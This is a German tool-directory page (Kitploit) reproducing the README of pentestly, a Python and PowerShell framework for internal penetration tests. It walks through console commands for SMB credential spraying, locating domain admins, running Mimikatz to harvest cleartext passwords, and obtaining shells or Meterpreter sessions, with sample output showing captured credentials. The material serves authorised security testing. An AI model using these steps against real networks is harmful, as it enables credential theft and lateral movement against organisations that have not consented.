Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
pentestly — Python- und PowerShell-Framework für interne Penetrationstests | Kitploit
Tools/GitHubGitHub/praetorian-inc/pentestly
Penetrationstest-FrameworksPrivilege EscalationAufklärungPasswortangriffeExploitationLaterale BewegungInformationsbeschaffungPost-ExploitationPenetrationstestsCommand and ControlRed TeamingArchived
72113721vor 10 JahrenVon Kitploit geprüft
GitHubpraetorian-inc/pentestly

pentestly

Python- und PowerShell-Framework für interne Penetrationstests

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Pentestly

Pentestly ist eine Kombination aus erweiterbaren Python-Werkzeugen für den Einsatz in Penetrationstests. Das Ziel ist es, eine vertraute Benutzeroberfläche zu nutzen und gleichzeitig Beiträge zum Framework mit der Leistungsfähigkeit von Python einfach zu gestalten.

Blogbeitrag: Pentestly Framework: Wenn Pentesting auf Python und Powershell trifft

Autor: @ctfhacker / Cory Duplantis

Demo

asciicast

Aktuelle Funktionen

  • NMAP XML importieren
  • SMB-Authentifizierung testen mit:
    • einzelnen Anmeldedaten
    • einer Datei mit Anmeldedaten
    • leeren Anmeldedaten
    • NTLM-Hash
  • Lokale Administratorrechte für erfolgreiche SMB-Authentifizierung testen
  • Lesbare SMB-Freigaben für gültige Anmeldedaten identifizieren
  • Domain-/Enterprise-Admin-Kontonamen speichern
  • Standort laufender Domain-Admin-Prozesse ermitteln
  • Systeme angemeldeter Domain-Admins ermitteln
  • Powershell-Befehle im Arbeitsspeicher ausführen und Ergebnisse extrahieren
  • Mimikatz ausführen, um Klartext-Passwörter aus dem Speicher zu sammeln (Invoke-Mimikatz.ps1)
  • Eine Befehls-Shell empfangen (Powercat)
  • Eine Meterpreter-Sitzung empfangen (Invoke-Shellcode.ps1)

Auf den Schultern von Giganten

Pentestly steht auf den Schultern von Giganten. Im Folgenden sind die derzeit in Pentestly verwendeten Werkzeuge aufgeführt:

  • recon-ng - Die Backend-Datenbank von recon-ng ist wunderschön erstellt und wird in Pentestly für die Datenmanipulation genutzt.

  • wmiexec.py - Ermöglicht uns, Powershell-Befehle schnell und einfach über WMI auszuführen.

  • smbmap.py - Nützliches Werkzeug zur Aufzählung von SMB-Freigaben.

  • Invoke-Mimikatz.ps1 - Implementierung von Mimikatz in Powershell.

  • powercat.ps1 - Netcat-ähnliche Funktionalität in Powershell.

  • Invoke-Shellcode.ps1 - Meterpreter in Powershell bereitstellen.

  • CrackMapExec - Inspirationsquelle für den einfachen Mimikatz-Server in Pentestly.

Installation

git clone https://github.com/praetorian-inc/pentestly.git
./install.sh
./pentestly

Verwendung

Lassen Sie uns einige der derzeit implementierten Funktionen durchgehen.

Arbeitsbereich wechseln

[pentestly][default] > workspaces list

  +------------+
  | Workspaces |
  +------------+
  | default    |
  +------------+

[pentestly][default] > workspaces add project
[pentestly][project] > workspaces select project

Von nmap laden

[pentestly][project][nmap_xml] > load nmap
[pentestly][project][nmap_xml] > set filename /root/PROJECT/full-all-alive.xml
FILENAME => /root/PROJECT/full-all-alive.xml
[pentestly][project][nmap_xml] > show options

  Name      Current Value                      Required  Description
  --------  -------------                      --------  -----------
  FILENAME  /root/PROJECT/full-all-alive.xml  yes       Path and filename for nmap XML input

[pentestly][project][nmap_xml] > run

Anmeldungen testen

Datei mit Anmeldedaten verwenden, um Anmeldung zu testen

[pentestly][project][login] > cat /tmp/creds
[*] Command: cat /tmp/creds
user1 pass1
user2 pass2
[pentestly][project][login] > load login
[pentestly][project][login] > set userpass_file /tmp/creds
USERPASS_FILE => /tmp/creds
[pentestly][project][login] > set username ''
USERNAME => ''
[pentestly][project][login] > set password ''
PASSWORD => ''
[pentestly][project][login] > run

Einzelnen Benutzernamen und Passwort verwenden

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run

Anmeldedaten über eine kleine Teilmenge von IPs verwenden d.h. über das in der Tabelle gefundene 192.168.8.0/24

[pentestly][project][login] > load login
[pentestly][project][login] > set username admin
USERNAME => admin
[pentestly][project][login] > set password password
PASSWORD => password
[pentestly][project][login] > set userpass_file ''
USERPASS_FILE => ''
[pentestly][project][login] > run
[pentestly][project][login] > set source query select * from pentestly_creds where host like '192.168.8.%'

Domain- und Enterprise-Admins sammeln

[pentestly][project][login] > load get_domain # Notice fuzzy searching - get_domain finds get_domain_admin_names
[pentestly][project][get_domain_admin_names] > show options

  Name    Current Value  Required  Description
  ------  -------------  --------  -----------
  SOURCE  default        yes       source of input (see 'show info' for details)

[pentestly][project][get_domain_admin_names] > run
[*] Found Domain Admin: domain\admin1
[*] Found Domain Admin: domain\admin2

Mimikatz über IPs mit Ausführungsrechten ausführen

[pentestly][default][get_domain_admin_names] > load mimi
[pentestly][default][mimikatz] > run
Select local interface for hosting scripts

0. 127.0.0.1
1. 10.220.8.94
2. 172.27.67.14
> 1

[*] Execution creds: domain\Admin:[email protected]
[*] Success! Admin.DA:p@$$w0rd  - DOMAIN ADMIN!

Lokale Admins anzeigen

[pentestly][default][show_local_admins] > load show_local_admins
[pentestly][default][show_local_admins] > run

+---------------------------------------------------------------------------------------------------------------+
|      host      | access |  username  |  password  | domain | process | logged_in | success | execute | module |
+---------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 |        | nsportsman | password1! | zojix  |         |           | True    | True    | login  |
+---------------------------------------------------------------------------------------------------------------+

Domain-Admins anzeigen

[pentestly][default][show_domain_admins] > load show_domain_admins
[pentestly][default][show_domain_admins] > run

+--------------------------------------------------------------------------------------------------------------------------+
|      host      | access        | username  |  password       | domain | process | logged_in | success | execute | module |
+--------------------------------------------------------------------------------------------------------------------------+
| 10.202.208.112 | Domain Admin  | TheRealDA | </l33TPassword> | zojix  |         |           | True    | True    | login  |
+--------------------------------------------------------------------------------------------------------------------------+

Enumshares

[pentestly][default] > load enums
[pentestly][default][enumshares] > run
[*] Execution creds: workgroup\Administrator:[email protected]
defaultdict(<type 'list'>, {'readonly': [u'ADMIN$', u'C', u'C$', u'Users'], 'noaccess': [u'IPC$']})

Neue Freigaben anzeigen

[pentestly][default][interesting_files] > show pentestly_shares
Tool herunterladen